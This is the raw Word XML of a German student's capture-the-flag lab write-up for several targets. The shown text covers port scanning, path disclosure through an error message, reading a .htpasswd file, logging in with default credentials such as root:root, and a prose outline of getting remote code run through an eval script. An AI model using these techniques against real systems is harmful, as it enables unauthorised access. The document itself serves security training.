        <w:t>Nicht bearbeitet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC0275" w14:textId="7ED41ECC" w:rsidR="00775EB8" w:rsidRDefault="00775EB8" w:rsidP="00775EB8">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc438881"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Level3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="2AAE788A" w14:textId="43C16D94" w:rsidR="00775EB8" w:rsidRDefault="00775EB8" w:rsidP="00775EB8">
      <w:r>
        <w:t xml:space="preserve">Diese Aufgabe hab ich </w:t>
      </w:r>
      <w:r w:rsidR="00C60D48">
        <w:t xml:space="preserve">zwar bearbeitet und denke ich auch verstanden, allerdings fehlte mir die Zeit um die letzten Fehler zu </w:t>
      </w:r>
      <w:r w:rsidR="001E56B1">
        <w:t>beheben.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E959537" w14:textId="28BF6981" w:rsidR="001E56B1" w:rsidRDefault="001E56B1" w:rsidP="00775EB8">
      <w:r>
        <w:t>Was ich gemacht habe ist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6892FE0C" w14:textId="77777777" w:rsidR="00B114C3" w:rsidRDefault="001E56B1" w:rsidP="00775EB8">
      <w:r>
        <w:t xml:space="preserve">Ich habe mir das callmemaybe.php skript aus dem backup </w:t>
      </w:r>
      <w:r w:rsidR="006D5460">
        <w:t>Ordner angeschaut</w:t>
      </w:r>
      <w:r w:rsidR="005A3994">
        <w:t>. So kann man herausfinden, dass das Skript eine Datei einliest</w:t>
      </w:r>
      <w:r w:rsidR="00396AE5">
        <w:t xml:space="preserve"> und sobald der string „</w:t>
      </w:r>
      <w:r w:rsidR="00A00BF7">
        <w:t>/*</w:t>
      </w:r>
      <w:r w:rsidR="001958CA">
        <w:t>i_am</w:t>
      </w:r>
      <w:r w:rsidR="00A00BF7">
        <w:t>_on_the_guestlist*/</w:t>
      </w:r>
      <w:r w:rsidR="00396AE5">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C874D3">
        <w:t xml:space="preserve"> vorhanden ist, nimmt er die eingelesene Datei als </w:t>
      </w:r>
      <w:r w:rsidR="00B114C3">
        <w:t>Parameter für das eval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37506A0F" w14:textId="37E19643" w:rsidR="006A43B2" w:rsidRDefault="00B114C3" w:rsidP="00775EB8">
      <w:r>
        <w:t xml:space="preserve">Um </w:t>
      </w:r>
      <w:r w:rsidR="00233503">
        <w:t>jetzt eine Datei einlesen zu können muss man einen Server öffnen der die Datei bereitstellt</w:t>
      </w:r>
      <w:r w:rsidR="002D0ECE">
        <w:t xml:space="preserve">, die man ausführen möchte und dann das callmemaybe skript mit der url </w:t>
      </w:r>
      <w:r w:rsidR="00FF11F0">
        <w:t>zu der Datei aufrufen. Dazu muss man seine IP-Adresse im VPN kennen und verwenden</w:t>
      </w:r>
      <w:r w:rsidR="009F31A4">
        <w:t>. Mi</w:t>
      </w:r>
      <w:r w:rsidR="00346366">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="009F31A4">
        <w:t xml:space="preserve">hilfe der </w:t>
      </w:r>
      <w:r w:rsidR="00346366">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="009F31A4">
        <w:t xml:space="preserve">atei kann man nun nach der Flag im Root Verzeichnis suchen </w:t>
      </w:r>
      <w:r w:rsidR="006A43B2">
        <w:t xml:space="preserve">wenn davor alles funktioniert hat. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F3A9A" w14:textId="3A3BAFAA" w:rsidR="001E56B1" w:rsidRPr="00775EB8" w:rsidRDefault="006A43B2" w:rsidP="00775EB8">
      <w:r>
        <w:t xml:space="preserve">Ich konnte blöderweise </w:t>
      </w:r>
      <w:r w:rsidR="00346366">
        <w:t>die Datei auf meinem System nicht von der M&amp;M Seite aufrufen.</w:t>
      </w:r>
      <w:r w:rsidR="005A3994">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2150365B" w14:textId="30CB452B" w:rsidR="000A11B0" w:rsidRDefault="000A11B0" w:rsidP="000A11B0">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc438882"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Fritt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="01294E3A" w14:textId="5A18C357" w:rsidR="00153290" w:rsidRDefault="00743BB1" w:rsidP="00743BB1">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc438883"/>
      <w:r>
        <w:t>Level 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="030AB9ED" w14:textId="16EBFA91" w:rsidR="00743BB1" w:rsidRDefault="00743BB1" w:rsidP="00743BB1">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc438884"/>
      <w:r>
        <w:t>Port Scan:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="75F83D00" w14:textId="72A5F496" w:rsidR="002C2279" w:rsidRPr="002C2279" w:rsidRDefault="002C2279" w:rsidP="002C2279">
      <w:r>
        <w:t>Der Port Scan kann wie folgt durchgeführt werden:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78315F6A" w14:textId="07C98A5B" w:rsidR="00743BB1" w:rsidRDefault="00743BB1" w:rsidP="00743BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03E89F48" wp14:editId="192728A6">
            <wp:extent cx="5400675" cy="217932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2179320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD8AAA" w14:textId="784EEAD0" w:rsidR="002C2279" w:rsidRDefault="00655965" w:rsidP="00743BB1">
      <w:r>
        <w:t>Anhand dieses Scans lässt dich erkennen, dass hier zwei</w:t>
      </w:r>
      <w:r w:rsidR="004F73CB">
        <w:t xml:space="preserve"> Webserver laufen, einer auf Port 80 und einer auf Port 8888</w:t>
      </w:r>
      <w:r w:rsidR="003E11AE">
        <w:t>, außerdem ist der ssh Port noch geöffnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280E145F" w14:textId="207E87FA" w:rsidR="00743BB1" w:rsidRDefault="00743BB1" w:rsidP="00743BB1">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc438885"/>
      <w:r>
        <w:t>Vorhandene Dateien</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="313352AB" w14:textId="69733571" w:rsidR="00743BB1" w:rsidRDefault="00743BB1" w:rsidP="00743BB1">
      <w:r>
        <w:t>Port 80:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D62FBC" w14:textId="1572879F" w:rsidR="00743BB1" w:rsidRDefault="003C023A" w:rsidP="00743BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251654656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09330F86" wp14:editId="18044AF7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1013798</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1476713</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="410901" cy="109959"/>
                <wp:effectExtent l="0" t="0" r="27305" b="23495"/>
                <wp:wrapNone/>
                <wp:docPr id="107" name="Rechteck 107"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="410901" cy="109959"/>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A8DFE" id="Rechteck 107" o:spid="_x0000_s1026" style="position:absolute;margin-left:79.85pt;margin-top:116.3pt;width:32.35pt;height:8.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" filled="f" strokecolor="#9bbb59 [3206]" strokeweight="1.5pt">
                <v:stroke joinstyle="round"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00743BB1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30FDC68C" wp14:editId="30F996AB">
            <wp:extent cx="3813858" cy="3425073"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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3858" cy="3425073"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61250157" w14:textId="7308B4A4" w:rsidR="00743BB1" w:rsidRDefault="00743BB1" w:rsidP="00743BB1"/>
    <w:p w14:paraId="59217011" w14:textId="2002C000" w:rsidR="00743BB1" w:rsidRDefault="00743BB1" w:rsidP="00743BB1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port 8888:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855D8A2" w14:textId="04B4812D" w:rsidR="00743BB1" w:rsidRDefault="005E2A9B" w:rsidP="00743BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B6C111D" wp14:editId="235A3937">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2067142</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2551776</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="451357" cy="162045"/>
                <wp:effectExtent l="0" t="0" r="25400" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="108" name="Rechteck 108"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="451357" cy="162045"/>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189F" id="Rechteck 108" o:spid="_x0000_s1026" style="position:absolute;margin-left:162.75pt;margin-top:200.95pt;width:35.5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" filled="f" strokecolor="#9bbb59 [3206]" strokeweight="1.5pt">
                <v:stroke joinstyle="round"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00743BB1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63ED5C0C" wp14:editId="78179185">
            <wp:extent cx="5400675" cy="6035675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="317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6035675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCC5592" w14:textId="285CB4AD" w:rsidR="00185778" w:rsidRDefault="00185778" w:rsidP="00743BB1">
      <w:r>
        <w:t>Die unterschiede der beiden Webserver</w:t>
      </w:r>
      <w:r w:rsidR="009E32FC">
        <w:t xml:space="preserve"> sind oben markiert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682FA2B3" w14:textId="3EC89CCA" w:rsidR="005E2A9B" w:rsidRDefault="00723018" w:rsidP="00723018">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc438886"/>
      <w:r>
        <w:t>Absolute Path:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="3133C9E0" w14:textId="0824DA3D" w:rsidR="00723018" w:rsidRDefault="00723018" w:rsidP="00723018">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1241B72D" wp14:editId="454FCF56">
            <wp:extent cx="5400675" cy="1263015"/>
            <wp:effectExtent l="0" t="0" r="952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1263015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D4FAA7" w14:textId="3DD0277D" w:rsidR="00723018" w:rsidRDefault="00723018" w:rsidP="00723018">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="457A476D" wp14:editId="16043B02">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>990801</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3891489</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2309149" cy="202557"/>
                <wp:effectExtent l="0" t="0" r="15240" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="111" name="Rechteck 111"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2309149" cy="20255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B77BB" id="Rechteck 111" o:spid="_x0000_s1026" style="position:absolute;margin-left:78pt;margin-top:306.4pt;width:181.8pt;height:1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" filled="f" strokecolor="black [3200]" strokeweight="1.5pt">
                <v:stroke joinstyle="round"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="085DC640" wp14:editId="1B2CA561">
            <wp:extent cx="5038725" cy="4815069"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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584"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5038725" cy="4815069"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7587C557" w14:textId="72512EFE" w:rsidR="00723018" w:rsidRDefault="00723018" w:rsidP="00723018">
      <w:r>
        <w:t>Vermutung: Dateien lesen ist möglich</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B0C11" w14:textId="2BAB6EB3" w:rsidR="00723018" w:rsidRDefault="00723018" w:rsidP="00723018">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28942016" wp14:editId="0655656C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>684072</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>60132</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="306729" cy="115747"/>
                <wp:effectExtent l="0" t="0" r="17145" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="113" name="Rechteck 113"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="306729" cy="1157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0405F" id="Rechteck 113" o:spid="_x0000_s1026" style="position:absolute;margin-left:53.85pt;margin-top:4.75pt;width:24.15pt;height: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" filled="f" strokecolor="black [3200]">
                <v:stroke joinstyle="round"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12AD9C65" wp14:editId="7A189245">
            <wp:extent cx="5400675" cy="972820"/>
            <wp:effectExtent l="0" t="0" r="952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972820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC2A689" w14:textId="4939347B" w:rsidR="00723018" w:rsidRDefault="00723018" w:rsidP="00723018">
      <w:r>
        <w:t>Pfad: Port 8888:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ED2D38" w14:textId="5D653708" w:rsidR="00723018" w:rsidRDefault="00723018" w:rsidP="00723018">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E10884B" wp14:editId="4A1CEE46">
            <wp:extent cx="5400675" cy="850900"/>
            <wp:effectExtent l="0" t="0" r="9525"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850900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFD0E91" w14:textId="1E714D28" w:rsidR="00723018" w:rsidRDefault="00723018" w:rsidP="00723018">
      <w:r>
        <w:t>Port 80:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E53EFC1" w14:textId="21E2026A" w:rsidR="00723018" w:rsidRDefault="00723018" w:rsidP="00723018">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40BE71DB" wp14:editId="2B5804CD">
            <wp:extent cx="5400675" cy="794385"/>
            <wp:effectExtent l="0" t="0" r="9525" b="571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794385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76835BE5" w14:textId="011782A2" w:rsidR="005850C0" w:rsidRDefault="005850C0" w:rsidP="00723018">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Der </w:t>
      </w:r>
      <w:r w:rsidR="005F3BDD">
        <w:t>absolute Pfad lässt sich herausfinden, indem man die Landing Page genauer anschaut</w:t>
      </w:r>
      <w:r w:rsidR="00E355CE">
        <w:t>. Dort findet man eine PHP Datei, die einen Parameter erhält der stark an einen Datei</w:t>
      </w:r>
      <w:r w:rsidR="009A7F52">
        <w:t>aufruf mit einem relativen Pfad erinnert. Ruft man dieses Skript nun mit einer Datei als Parameter auf, die nicht existiert</w:t>
      </w:r>
      <w:r w:rsidR="00101F80">
        <w:t xml:space="preserve">, so erhält man die Antwort, dass die Datei nicht gefunden werden </w:t>
      </w:r>
      <w:r w:rsidR="00227CFA">
        <w:t>konnte und unter welchem Pfad die Datei gesucht wurde.</w:t>
      </w:r>
      <w:r w:rsidR="00AC6154">
        <w:t xml:space="preserve"> Daran kann man erkennen was das Webserver Verzeichnis ist.</w:t>
      </w:r>
      <w:r w:rsidR="009A7F52">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583656DD" w14:textId="79CB26EF" w:rsidR="005B7D93" w:rsidRDefault="005B7D93" w:rsidP="00723018"/>
    <w:p w14:paraId="01A1A3E7" w14:textId="6DF3A145" w:rsidR="005B7D93" w:rsidRDefault="005B7D93" w:rsidP="005B7D93">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc438887"/>
      <w:r>
        <w:t>Level 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="367ECDE7" w14:textId="0C870952" w:rsidR="005B7D93" w:rsidRDefault="00AC6154" w:rsidP="005B7D93">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc438888"/>
      <w:r>
        <w:t>Zutritt</w:t>
      </w:r>
      <w:r w:rsidR="0034076B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00522F29">
        <w:t>zum</w:t>
      </w:r>
      <w:r w:rsidR="0034076B">
        <w:t xml:space="preserve"> Admin</w:t>
      </w:r>
      <w:r w:rsidR="00522F29">
        <w:t xml:space="preserve"> Bereich</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="47257700" w14:textId="0D326023" w:rsidR="00F01E95" w:rsidRPr="001772B9" w:rsidRDefault="00F01E95" w:rsidP="00F01E95">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001772B9">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>w0w_1s_fr1tt_a_ch3w_{9c286b162fcc1ef2df32db984e62850cde4e4624110843c7fc0dae0a}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609EE632" w14:textId="5152F92E" w:rsidR="00F01E95" w:rsidRDefault="00986335" w:rsidP="00F01E95">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E92742" wp14:editId="2140A5CD">
            <wp:extent cx="5400675" cy="1081405"/>
            <wp:effectExtent l="0" t="0" r="9525" b="444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1081405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="772E4348" w14:textId="3CB88B03" w:rsidR="007947A0" w:rsidRDefault="007947A0" w:rsidP="00F01E95">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7487EFF1" wp14:editId="1E0CEC2F">
            <wp:extent cx="3105150" cy="192405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5150" cy="1924050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB9C989" w14:textId="57C44BFA" w:rsidR="00D37D96" w:rsidRPr="00806C98" w:rsidRDefault="00D37D96" w:rsidP="00F01E95">
      <w:r>
        <w:t>Hier muss man eine Weile suchen</w:t>
      </w:r>
      <w:r w:rsidR="00612007">
        <w:t xml:space="preserve"> aber wenn man den Standard Pfad zum Admin Bereich kennt, findet man früher oder später heraus, dass </w:t>
      </w:r>
      <w:r w:rsidR="00EF3B72">
        <w:t>unter /var/www/admin/admin</w:t>
      </w:r>
      <w:r w:rsidR="003E4D35">
        <w:t xml:space="preserve">/ die datei .htpasswd zu finden ist in der sich </w:t>
      </w:r>
      <w:r w:rsidR="007E6ABE">
        <w:t>das admin passwort befindet. Mit den Zugangsdaten fritt-admin</w:t>
      </w:r>
      <w:r w:rsidR="00761C00">
        <w:t>:fritt-admin findet man dann die oben aufgeführte Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70996A30" w14:textId="60BA1BF1" w:rsidR="00280FE8" w:rsidRDefault="00280FE8" w:rsidP="00280FE8">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc438889"/>
      <w:r>
        <w:t>Level 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="5ECED899" w14:textId="1CBEB3BF" w:rsidR="00280FE8" w:rsidRDefault="00522F29" w:rsidP="00280FE8">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc438890"/>
      <w:r>
        <w:t>System kompromittieren</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="5B025764" w14:textId="024F48A8" w:rsidR="00ED7CB1" w:rsidRPr="00ED7CB1" w:rsidRDefault="00ED7CB1" w:rsidP="00ED7CB1">
      <w:r>
        <w:t>Nicht bearbeitet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3A961F" w14:textId="34F22957" w:rsidR="000A11B0" w:rsidRDefault="000A11B0" w:rsidP="000A11B0">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc438891"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kinderriegel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="4928B6B0" w14:textId="44DA3D44" w:rsidR="000344F6" w:rsidRDefault="000344F6" w:rsidP="000344F6">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc438892"/>
      <w:r>
        <w:t xml:space="preserve">Level </w:t>
      </w:r>
      <w:r w:rsidR="006808F4">
        <w:t>2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="0FBD9225" w14:textId="08560B11" w:rsidR="006808F4" w:rsidRDefault="006808F4" w:rsidP="006808F4">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc438893"/>
      <w:r>
        <w:t>Zugang zum Backend</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="67F33608" w14:textId="1DF48B3A" w:rsidR="00450CD2" w:rsidRDefault="00061EAC" w:rsidP="00450CD2">
      <w:r>
        <w:t>Im Verzeichnis „tools“ gibt es einen Login zum Adminer tool. Username und Passwort sind „root“</w:t>
      </w:r>
      <w:r w:rsidR="006B5CE3">
        <w:t>(herausfinden durch ausprobieren)</w:t>
      </w:r>
      <w:r w:rsidR="009B21EC">
        <w:t xml:space="preserve"> so erhält man Zugriff auf die Flag im Backend (Usernamen und </w:t>
      </w:r>
      <w:r w:rsidR="006C7F97">
        <w:t>Passwörter stehen in der Datenbank</w:t>
      </w:r>
      <w:r w:rsidR="009B21EC">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006C7F97">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3A92A9" w14:textId="77777777" w:rsidR="00450CD2" w:rsidRPr="00450CD2" w:rsidRDefault="00450CD2" w:rsidP="00450CD2"/>
    <w:p w14:paraId="5924CF10" w14:textId="4F53A865" w:rsidR="00B44BBA" w:rsidRDefault="00EA069E" w:rsidP="00B44BBA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
